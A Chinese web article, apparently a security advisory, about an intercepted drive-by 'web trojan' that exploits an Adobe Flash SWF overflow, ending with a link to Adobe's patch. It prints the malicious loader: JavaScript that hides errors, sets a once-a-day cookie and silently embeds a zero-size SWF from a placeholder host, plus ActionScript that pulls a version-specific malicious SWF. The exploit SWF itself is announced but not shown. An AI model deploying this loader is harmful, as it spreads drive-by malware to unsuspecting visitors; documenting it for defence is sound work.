欢迎来到代码驿站!

当前位置:首页 >

FLASH网马官方补丁

时间:2021-08-25 08:02:24|栏目:|点击:

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:


<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write('<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>');
document.write('<param name=”allowScriptAccess” value=”sameDomain”/>');
document.write('<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('<param name=”quality” value=”high”/>');
document.write('<param name=”bgcolor” value=”#ffffff”/>');
document.write('<embed src=”http://www.XXX.cn/flash/XX.swf” src=”http://www.XXX.cn/flash/XX.swf”/>');
document.write('</object>');
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>  以下为正常的FLASH文件使用的脚本:

// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();
该恶意FLASH部分内容如下:


建议:
厂商补丁: Adobe
―?C
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.adobe.com/go/getflash

上一篇:R语言利用plot()函数画图的基本用法

栏    目:

下一篇:docker 容器上编译 go 程序提示找不到文件问题

本文标题:FLASH网马官方补丁

本文地址:http://www.codeinn.net/misctech/169811.html

推荐教程

广告投放 | 联系我们 | 版权申明

重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:914707363 | 邮箱:codeinn#126.com(#换成@)

Copyright © 2020 代码驿站 版权所有